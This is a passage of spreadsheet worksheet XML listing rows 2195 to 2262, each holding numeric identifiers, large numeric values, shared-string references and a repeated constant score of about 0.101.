      <c r="A2195" s="1">
        <v>8727.0</v>
      </c>
      <c r="B2195" s="2">
        <v>5.4518123E7</v>
      </c>
      <c r="C2195" s="2" t="s">
        <v>2021</v>
      </c>
      <c r="D2195" s="2">
        <v>1.0</v>
      </c>
      <c r="E2195" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2195" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2196" ht="15.75" customHeight="1">
      <c r="A2196" s="1">
        <v>8741.0</v>
      </c>
      <c r="B2196" s="2">
        <v>5.4529441E7</v>
      </c>
      <c r="C2196" s="2" t="s">
        <v>2022</v>
      </c>
      <c r="D2196" s="2">
        <v>1.0</v>
      </c>
      <c r="E2196" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2196" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2197" ht="15.75" customHeight="1">
      <c r="A2197" s="1">
        <v>8903.0</v>
      </c>
      <c r="B2197" s="2">
        <v>5.4795425E7</v>
      </c>
      <c r="C2197" s="2" t="s">
        <v>2023</v>
      </c>
      <c r="D2197" s="2">
        <v>1.0</v>
      </c>
      <c r="E2197" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2197" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2198" ht="15.75" customHeight="1">
      <c r="A2198" s="1">
        <v>9254.0</v>
      </c>
      <c r="B2198" s="2">
        <v>5.5477771E7</v>
      </c>
      <c r="C2198" s="2" t="s">
        <v>2024</v>
      </c>
      <c r="D2198" s="2">
        <v>1.0</v>
      </c>
      <c r="E2198" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2198" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2199" ht="15.75" customHeight="1">
      <c r="A2199" s="1">
        <v>9262.0</v>
      </c>
      <c r="B2199" s="2">
        <v>5.5491338E7</v>
      </c>
      <c r="C2199" s="2" t="s">
        <v>2025</v>
      </c>
      <c r="D2199" s="2">
        <v>1.0</v>
      </c>
      <c r="E2199" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2199" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2200" ht="15.75" customHeight="1">
      <c r="A2200" s="1">
        <v>9749.0</v>
      </c>
      <c r="B2200" s="2">
        <v>5.6485056E7</v>
      </c>
      <c r="C2200" s="2" t="s">
        <v>2026</v>
      </c>
      <c r="D2200" s="2">
        <v>1.0</v>
      </c>
      <c r="E2200" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2200" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2201" ht="15.75" customHeight="1">
      <c r="A2201" s="1">
        <v>10771.0</v>
      </c>
      <c r="B2201" s="2">
        <v>1.5608489E7</v>
      </c>
      <c r="C2201" s="2" t="s">
        <v>2027</v>
      </c>
      <c r="D2201" s="2">
        <v>1.0</v>
      </c>
      <c r="E2201" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2201" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2202" ht="15.75" customHeight="1">
      <c r="A2202" s="1">
        <v>11443.0</v>
      </c>
      <c r="B2202" s="2">
        <v>2.1765338E7</v>
      </c>
      <c r="C2202" s="2" t="s">
        <v>2028</v>
      </c>
      <c r="D2202" s="2">
        <v>1.0</v>
      </c>
      <c r="E2202" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2202" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2203" ht="15.75" customHeight="1">
      <c r="A2203" s="1">
        <v>11572.0</v>
      </c>
      <c r="B2203" s="2">
        <v>2.2773671E7</v>
      </c>
      <c r="C2203" s="2" t="s">
        <v>2029</v>
      </c>
      <c r="D2203" s="2">
        <v>1.0</v>
      </c>
      <c r="E2203" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2203" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2204" ht="15.75" customHeight="1">
      <c r="A2204" s="1">
        <v>12186.0</v>
      </c>
      <c r="B2204" s="2">
        <v>2.7481027E7</v>
      </c>
      <c r="C2204" s="2" t="s">
        <v>2030</v>
      </c>
      <c r="D2204" s="2">
        <v>1.0</v>
      </c>
      <c r="E2204" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2204" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2205" ht="15.75" customHeight="1">
      <c r="A2205" s="1">
        <v>12426.0</v>
      </c>
      <c r="B2205" s="2">
        <v>2.918425E7</v>
      </c>
      <c r="C2205" s="2" t="s">
        <v>2031</v>
      </c>
      <c r="D2205" s="2">
        <v>1.0</v>
      </c>
      <c r="E2205" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2205" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2206" ht="15.75" customHeight="1">
      <c r="A2206" s="1">
        <v>13247.0</v>
      </c>
      <c r="B2206" s="2">
        <v>3.4265174E7</v>
      </c>
      <c r="C2206" s="2" t="s">
        <v>2032</v>
      </c>
      <c r="D2206" s="2">
        <v>1.0</v>
      </c>
      <c r="E2206" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2206" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2207" ht="15.75" customHeight="1">
      <c r="A2207" s="1">
        <v>14735.0</v>
      </c>
      <c r="B2207" s="2">
        <v>4.0690128E7</v>
      </c>
      <c r="C2207" s="2" t="s">
        <v>2033</v>
      </c>
      <c r="D2207" s="2">
        <v>1.0</v>
      </c>
      <c r="E2207" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2207" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2208" ht="15.75" customHeight="1">
      <c r="A2208" s="1">
        <v>14996.0</v>
      </c>
      <c r="B2208" s="2">
        <v>4.1449362E7</v>
      </c>
      <c r="C2208" s="2" t="s">
        <v>2034</v>
      </c>
      <c r="D2208" s="2">
        <v>1.0</v>
      </c>
      <c r="E2208" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2208" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2209" ht="15.75" customHeight="1">
      <c r="A2209" s="1">
        <v>15076.0</v>
      </c>
      <c r="B2209" s="2">
        <v>4.1728178E7</v>
      </c>
      <c r="C2209" s="2" t="s">
        <v>2035</v>
      </c>
      <c r="D2209" s="2">
        <v>1.0</v>
      </c>
      <c r="E2209" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2209" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2210" ht="15.75" customHeight="1">
      <c r="A2210" s="1">
        <v>15202.0</v>
      </c>
      <c r="B2210" s="2">
        <v>4.2077429E7</v>
      </c>
      <c r="C2210" s="2" t="s">
        <v>2036</v>
      </c>
      <c r="D2210" s="2">
        <v>1.0</v>
      </c>
      <c r="E2210" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2210" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2211" ht="15.75" customHeight="1">
      <c r="A2211" s="1">
        <v>15270.0</v>
      </c>
      <c r="B2211" s="2">
        <v>4.2358147E7</v>
      </c>
      <c r="C2211" s="2" t="s">
        <v>2037</v>
      </c>
      <c r="D2211" s="2">
        <v>1.0</v>
      </c>
      <c r="E2211" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2211" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2212" ht="15.75" customHeight="1">
      <c r="A2212" s="1">
        <v>15746.0</v>
      </c>
      <c r="B2212" s="2">
        <v>4.4118243E7</v>
      </c>
      <c r="C2212" s="2" t="s">
        <v>2038</v>
      </c>
      <c r="D2212" s="2">
        <v>1.0</v>
      </c>
      <c r="E2212" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2212" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2213" ht="15.75" customHeight="1">
      <c r="A2213" s="1">
        <v>16381.0</v>
      </c>
      <c r="B2213" s="2">
        <v>4.6194329E7</v>
      </c>
      <c r="C2213" s="2" t="s">
        <v>2039</v>
      </c>
      <c r="D2213" s="2">
        <v>1.0</v>
      </c>
      <c r="E2213" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2213" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2214" ht="15.75" customHeight="1">
      <c r="A2214" s="1">
        <v>16821.0</v>
      </c>
      <c r="B2214" s="2">
        <v>4.7857937E7</v>
      </c>
      <c r="C2214" s="2" t="s">
        <v>2040</v>
      </c>
      <c r="D2214" s="2">
        <v>1.0</v>
      </c>
      <c r="E2214" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2214" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2215" ht="15.75" customHeight="1">
      <c r="A2215" s="1">
        <v>17140.0</v>
      </c>
      <c r="B2215" s="2">
        <v>4.882972E7</v>
      </c>
      <c r="C2215" s="2" t="s">
        <v>2041</v>
      </c>
      <c r="D2215" s="2">
        <v>1.0</v>
      </c>
      <c r="E2215" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2215" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2216" ht="15.75" customHeight="1">
      <c r="A2216" s="1">
        <v>17223.0</v>
      </c>
      <c r="B2216" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C2216" s="2" t="s">
        <v>2042</v>
      </c>
      <c r="D2216" s="2">
        <v>1.0</v>
      </c>
      <c r="E2216" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2216" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2217" ht="15.75" customHeight="1">
      <c r="A2217" s="1">
        <v>17231.0</v>
      </c>
      <c r="B2217" s="2">
        <v>4.9066306E7</v>
      </c>
      <c r="C2217" s="2" t="s">
        <v>2043</v>
      </c>
      <c r="D2217" s="2">
        <v>1.0</v>
      </c>
      <c r="E2217" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2217" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2218" ht="15.75" customHeight="1">
      <c r="A2218" s="1">
        <v>17519.0</v>
      </c>
      <c r="B2218" s="2">
        <v>5.0076164E7</v>
      </c>
      <c r="C2218" s="2" t="s">
        <v>2044</v>
      </c>
      <c r="D2218" s="2">
        <v>1.0</v>
      </c>
      <c r="E2218" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2218" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2219" ht="15.75" customHeight="1">
      <c r="A2219" s="1">
        <v>17822.0</v>
      </c>
      <c r="B2219" s="2">
        <v>5.0915743E7</v>
      </c>
      <c r="C2219" s="2" t="s">
        <v>2045</v>
      </c>
      <c r="D2219" s="2">
        <v>1.0</v>
      </c>
      <c r="E2219" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2219" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2220" ht="15.75" customHeight="1">
      <c r="A2220" s="1">
        <v>18552.0</v>
      </c>
      <c r="B2220" s="2">
        <v>5.3143227E7</v>
      </c>
      <c r="C2220" s="2" t="s">
        <v>2046</v>
      </c>
      <c r="D2220" s="2">
        <v>1.0</v>
      </c>
      <c r="E2220" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2220" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2221" ht="15.75" customHeight="1">
      <c r="A2221" s="1">
        <v>18866.0</v>
      </c>
      <c r="B2221" s="2">
        <v>5.4008394E7</v>
      </c>
      <c r="C2221" s="2" t="s">
        <v>2047</v>
      </c>
      <c r="D2221" s="2">
        <v>1.0</v>
      </c>
      <c r="E2221" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2221" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2222" ht="15.75" customHeight="1">
      <c r="A2222" s="1">
        <v>19216.0</v>
      </c>
      <c r="B2222" s="2">
        <v>5.4995228E7</v>
      </c>
      <c r="C2222" s="2" t="s">
        <v>2048</v>
      </c>
      <c r="D2222" s="2">
        <v>1.0</v>
      </c>
      <c r="E2222" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2222" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2223" ht="15.75" customHeight="1">
      <c r="A2223" s="1">
        <v>19293.0</v>
      </c>
      <c r="B2223" s="2">
        <v>5.5186033E7</v>
      </c>
      <c r="C2223" s="2" t="s">
        <v>2049</v>
      </c>
      <c r="D2223" s="2">
        <v>1.0</v>
      </c>
      <c r="E2223" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2223" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2224" ht="15.75" customHeight="1">
      <c r="A2224" s="1">
        <v>19611.0</v>
      </c>
      <c r="B2224" s="2">
        <v>5.6203388E7</v>
      </c>
      <c r="C2224" s="2" t="s">
        <v>2050</v>
      </c>
      <c r="D2224" s="2">
        <v>1.0</v>
      </c>
      <c r="E2224" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2224" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2225" ht="15.75" customHeight="1">
      <c r="A2225" s="1">
        <v>20002.0</v>
      </c>
      <c r="B2225" s="2">
        <v>5.7715236E7</v>
      </c>
      <c r="C2225" s="2" t="s">
        <v>2051</v>
      </c>
      <c r="D2225" s="2">
        <v>1.0</v>
      </c>
      <c r="E2225" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2225" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2226" ht="15.75" customHeight="1">
      <c r="A2226" s="1">
        <v>20117.0</v>
      </c>
      <c r="B2226" s="2">
        <v>4947871.0</v>
      </c>
      <c r="C2226" s="2" t="s">
        <v>2052</v>
      </c>
      <c r="D2226" s="2">
        <v>1.0</v>
      </c>
      <c r="E2226" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2226" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2227" ht="15.75" customHeight="1">
      <c r="A2227" s="1">
        <v>20160.0</v>
      </c>
      <c r="B2227" s="2">
        <v>1.028816E7</v>
      </c>
      <c r="C2227" s="2" t="s">
        <v>2053</v>
      </c>
      <c r="D2227" s="2">
        <v>1.0</v>
      </c>
      <c r="E2227" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2227" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2228" ht="15.75" customHeight="1">
      <c r="A2228" s="1">
        <v>20294.0</v>
      </c>
      <c r="B2228" s="2">
        <v>1.1282999E7</v>
      </c>
      <c r="C2228" s="2" t="s">
        <v>2054</v>
      </c>
      <c r="D2228" s="2">
        <v>1.0</v>
      </c>
      <c r="E2228" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2228" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2229" ht="15.75" customHeight="1">
      <c r="A2229" s="1">
        <v>20757.0</v>
      </c>
      <c r="B2229" s="2">
        <v>1.4896614E7</v>
      </c>
      <c r="C2229" s="2" t="s">
        <v>2055</v>
      </c>
      <c r="D2229" s="2">
        <v>1.0</v>
      </c>
      <c r="E2229" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2229" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2230" ht="15.75" customHeight="1">
      <c r="A2230" s="1">
        <v>21324.0</v>
      </c>
      <c r="B2230" s="2">
        <v>2.0966487E7</v>
      </c>
      <c r="C2230" s="2" t="s">
        <v>2056</v>
      </c>
      <c r="D2230" s="2">
        <v>1.0</v>
      </c>
      <c r="E2230" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2230" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2231" ht="15.75" customHeight="1">
      <c r="A2231" s="1">
        <v>21458.0</v>
      </c>
      <c r="B2231" s="2">
        <v>2.2690207E7</v>
      </c>
      <c r="C2231" s="2" t="s">
        <v>2057</v>
      </c>
      <c r="D2231" s="2">
        <v>1.0</v>
      </c>
      <c r="E2231" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2231" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2232" ht="15.75" customHeight="1">
      <c r="A2232" s="1">
        <v>21610.0</v>
      </c>
      <c r="B2232" s="2">
        <v>2.443634E7</v>
      </c>
      <c r="C2232" s="2" t="s">
        <v>2058</v>
      </c>
      <c r="D2232" s="2">
        <v>1.0</v>
      </c>
      <c r="E2232" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2232" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2233" ht="15.75" customHeight="1">
      <c r="A2233" s="1">
        <v>21718.0</v>
      </c>
      <c r="B2233" s="2">
        <v>2.5523602E7</v>
      </c>
      <c r="C2233" s="2" t="s">
        <v>2059</v>
      </c>
      <c r="D2233" s="2">
        <v>1.0</v>
      </c>
      <c r="E2233" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2233" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2234" ht="15.75" customHeight="1">
      <c r="A2234" s="1">
        <v>21815.0</v>
      </c>
      <c r="B2234" s="2">
        <v>2.6881008E7</v>
      </c>
      <c r="C2234" s="2" t="s">
        <v>2060</v>
      </c>
      <c r="D2234" s="2">
        <v>1.0</v>
      </c>
      <c r="E2234" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2234" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2235" ht="15.75" customHeight="1">
      <c r="A2235" s="1">
        <v>21900.0</v>
      </c>
      <c r="B2235" s="2">
        <v>2.7886806E7</v>
      </c>
      <c r="C2235" s="2" t="s">
        <v>2061</v>
      </c>
      <c r="D2235" s="2">
        <v>1.0</v>
      </c>
      <c r="E2235" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2235" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2236" ht="15.75" customHeight="1">
      <c r="A2236" s="1">
        <v>22495.0</v>
      </c>
      <c r="B2236" s="2">
        <v>3.7144387E7</v>
      </c>
      <c r="C2236" s="2" t="s">
        <v>2062</v>
      </c>
      <c r="D2236" s="2">
        <v>1.0</v>
      </c>
      <c r="E2236" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2236" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2237" ht="15.75" customHeight="1">
      <c r="A2237" s="1">
        <v>22635.0</v>
      </c>
      <c r="B2237" s="2">
        <v>4.0606488E7</v>
      </c>
      <c r="C2237" s="2" t="s">
        <v>2063</v>
      </c>
      <c r="D2237" s="2">
        <v>1.0</v>
      </c>
      <c r="E2237" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2237" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2238" ht="15.75" customHeight="1">
      <c r="A2238" s="1">
        <v>22692.0</v>
      </c>
      <c r="B2238" s="2">
        <v>4.2263634E7</v>
      </c>
      <c r="C2238" s="2" t="s">
        <v>2064</v>
      </c>
      <c r="D2238" s="2">
        <v>1.0</v>
      </c>
      <c r="E2238" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2238" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2239" ht="15.75" customHeight="1">
      <c r="A2239" s="1">
        <v>22744.0</v>
      </c>
      <c r="B2239" s="2">
        <v>4.422646E7</v>
      </c>
      <c r="C2239" s="2" t="s">
        <v>2065</v>
      </c>
      <c r="D2239" s="2">
        <v>1.0</v>
      </c>
      <c r="E2239" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2239" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2240" ht="15.75" customHeight="1">
      <c r="A2240" s="1">
        <v>23197.0</v>
      </c>
      <c r="B2240" s="2">
        <v>5.2443504E7</v>
      </c>
      <c r="C2240" s="2" t="s">
        <v>2066</v>
      </c>
      <c r="D2240" s="2">
        <v>1.0</v>
      </c>
      <c r="E2240" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2240" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2241" ht="15.75" customHeight="1">
      <c r="A2241" s="1">
        <v>23275.0</v>
      </c>
      <c r="B2241" s="2">
        <v>5362147.0</v>
      </c>
      <c r="C2241" s="2" t="s">
        <v>2067</v>
      </c>
      <c r="D2241" s="2">
        <v>1.0</v>
      </c>
      <c r="E2241" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2241" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2242" ht="15.75" customHeight="1">
      <c r="A2242" s="1">
        <v>24029.0</v>
      </c>
      <c r="B2242" s="2">
        <v>9424169.0</v>
      </c>
      <c r="C2242" s="2" t="s">
        <v>2068</v>
      </c>
      <c r="D2242" s="2">
        <v>1.0</v>
      </c>
      <c r="E2242" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2242" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2243" ht="15.75" customHeight="1">
      <c r="A2243" s="1">
        <v>24194.0</v>
      </c>
      <c r="B2243" s="2">
        <v>1.0288159E7</v>
      </c>
      <c r="C2243" s="2" t="s">
        <v>2069</v>
      </c>
      <c r="D2243" s="2">
        <v>1.0</v>
      </c>
      <c r="E2243" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2243" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2244" ht="15.75" customHeight="1">
      <c r="A2244" s="1">
        <v>24331.0</v>
      </c>
      <c r="B2244" s="2">
        <v>1.0671858E7</v>
      </c>
      <c r="C2244" s="2" t="s">
        <v>2070</v>
      </c>
      <c r="D2244" s="2">
        <v>1.0</v>
      </c>
      <c r="E2244" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2244" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2245" ht="15.75" customHeight="1">
      <c r="A2245" s="1">
        <v>26121.0</v>
      </c>
      <c r="B2245" s="2">
        <v>1.5912121E7</v>
      </c>
      <c r="C2245" s="2" t="s">
        <v>2071</v>
      </c>
      <c r="D2245" s="2">
        <v>1.0</v>
      </c>
      <c r="E2245" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2245" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2246" ht="15.75" customHeight="1">
      <c r="A2246" s="1">
        <v>26567.0</v>
      </c>
      <c r="B2246" s="2">
        <v>1.784844E7</v>
      </c>
      <c r="C2246" s="2" t="s">
        <v>2072</v>
      </c>
      <c r="D2246" s="2">
        <v>1.0</v>
      </c>
      <c r="E2246" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2246" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2247" ht="15.75" customHeight="1">
      <c r="A2247" s="1">
        <v>27100.0</v>
      </c>
      <c r="B2247" s="2">
        <v>2.0547628E7</v>
      </c>
      <c r="C2247" s="2" t="s">
        <v>2073</v>
      </c>
      <c r="D2247" s="2">
        <v>1.0</v>
      </c>
      <c r="E2247" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2247" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2248" ht="15.75" customHeight="1">
      <c r="A2248" s="1">
        <v>27131.0</v>
      </c>
      <c r="B2248" s="2">
        <v>2.0745954E7</v>
      </c>
      <c r="C2248" s="2" t="s">
        <v>2074</v>
      </c>
      <c r="D2248" s="2">
        <v>1.0</v>
      </c>
      <c r="E2248" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2248" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2249" ht="15.75" customHeight="1">
      <c r="A2249" s="1">
        <v>27515.0</v>
      </c>
      <c r="B2249" s="2">
        <v>2.2166228E7</v>
      </c>
      <c r="C2249" s="2" t="s">
        <v>2075</v>
      </c>
      <c r="D2249" s="2">
        <v>1.0</v>
      </c>
      <c r="E2249" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2249" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2250" ht="15.75" customHeight="1">
      <c r="A2250" s="1">
        <v>27625.0</v>
      </c>
      <c r="B2250" s="2">
        <v>2.2690206E7</v>
      </c>
      <c r="C2250" s="2" t="s">
        <v>2076</v>
      </c>
      <c r="D2250" s="2">
        <v>1.0</v>
      </c>
      <c r="E2250" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2250" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2251" ht="15.75" customHeight="1">
      <c r="A2251" s="1">
        <v>27660.0</v>
      </c>
      <c r="B2251" s="2">
        <v>2.2865519E7</v>
      </c>
      <c r="C2251" s="2" t="s">
        <v>2077</v>
      </c>
      <c r="D2251" s="2">
        <v>1.0</v>
      </c>
      <c r="E2251" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2251" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2252" ht="15.75" customHeight="1">
      <c r="A2252" s="1">
        <v>27756.0</v>
      </c>
      <c r="B2252" s="2">
        <v>2.3105568E7</v>
      </c>
      <c r="C2252" s="2" t="s">
        <v>2078</v>
      </c>
      <c r="D2252" s="2">
        <v>1.0</v>
      </c>
      <c r="E2252" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2252" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2253" ht="15.75" customHeight="1">
      <c r="A2253" s="1">
        <v>27913.0</v>
      </c>
      <c r="B2253" s="2">
        <v>2.3731786E7</v>
      </c>
      <c r="C2253" s="2" t="s">
        <v>2079</v>
      </c>
      <c r="D2253" s="2">
        <v>1.0</v>
      </c>
      <c r="E2253" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2253" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2254" ht="15.75" customHeight="1">
      <c r="A2254" s="1">
        <v>28558.0</v>
      </c>
      <c r="B2254" s="2">
        <v>2.6881007E7</v>
      </c>
      <c r="C2254" s="2" t="s">
        <v>2080</v>
      </c>
      <c r="D2254" s="2">
        <v>1.0</v>
      </c>
      <c r="E2254" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2254" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2255" ht="15.75" customHeight="1">
      <c r="A2255" s="1">
        <v>28691.0</v>
      </c>
      <c r="B2255" s="2">
        <v>2.763809E7</v>
      </c>
      <c r="C2255" s="2" t="s">
        <v>2081</v>
      </c>
      <c r="D2255" s="2">
        <v>1.0</v>
      </c>
      <c r="E2255" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2255" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2256" ht="15.75" customHeight="1">
      <c r="A2256" s="1">
        <v>28844.0</v>
      </c>
      <c r="B2256" s="2">
        <v>2.8951979E7</v>
      </c>
      <c r="C2256" s="2" t="s">
        <v>2082</v>
      </c>
      <c r="D2256" s="2">
        <v>1.0</v>
      </c>
      <c r="E2256" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2256" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2257" ht="15.75" customHeight="1">
      <c r="A2257" s="1">
        <v>29505.0</v>
      </c>
      <c r="B2257" s="2">
        <v>3.2708482E7</v>
      </c>
      <c r="C2257" s="2" t="s">
        <v>2083</v>
      </c>
      <c r="D2257" s="2">
        <v>1.0</v>
      </c>
      <c r="E2257" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2257" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2258" ht="15.75" customHeight="1">
      <c r="A2258" s="1">
        <v>29517.0</v>
      </c>
      <c r="B2258" s="2">
        <v>3.2766527E7</v>
      </c>
      <c r="C2258" s="2" t="s">
        <v>2084</v>
      </c>
      <c r="D2258" s="2">
        <v>1.0</v>
      </c>
      <c r="E2258" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2258" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2259" ht="15.75" customHeight="1">
      <c r="A2259" s="1">
        <v>29910.0</v>
      </c>
      <c r="B2259" s="2">
        <v>3607050.0</v>
      </c>
      <c r="C2259" s="2" t="s">
        <v>2085</v>
      </c>
      <c r="D2259" s="2">
        <v>1.0</v>
      </c>
      <c r="E2259" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2259" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2260" ht="15.75" customHeight="1">
      <c r="A2260" s="1">
        <v>30403.0</v>
      </c>
      <c r="B2260" s="2">
        <v>3.8697756E7</v>
      </c>
      <c r="C2260" s="2" t="s">
        <v>2086</v>
      </c>
      <c r="D2260" s="2">
        <v>1.0</v>
      </c>
      <c r="E2260" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2260" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2261" ht="15.75" customHeight="1">
      <c r="A2261" s="1">
        <v>30991.0</v>
      </c>
      <c r="B2261" s="2">
        <v>4.7580758E7</v>
      </c>
      <c r="C2261" s="2" t="s">
        <v>2087</v>
      </c>
      <c r="D2261" s="2">
        <v>1.0</v>
      </c>
      <c r="E2261" s="3" t="s">
        <v>6</v>
      </c>
      <c r="F2261" s="2">
        <v>0.1013071895424836</v>
      </c>
    </row>
    <row r="2262" ht="15.75" customHeight="1">
      <c r="A2262" s="1">
        <v>31190.0</v>
      </c>
      <c r="B2262" s="2">
        <v>4918684.0</v>
      </c>
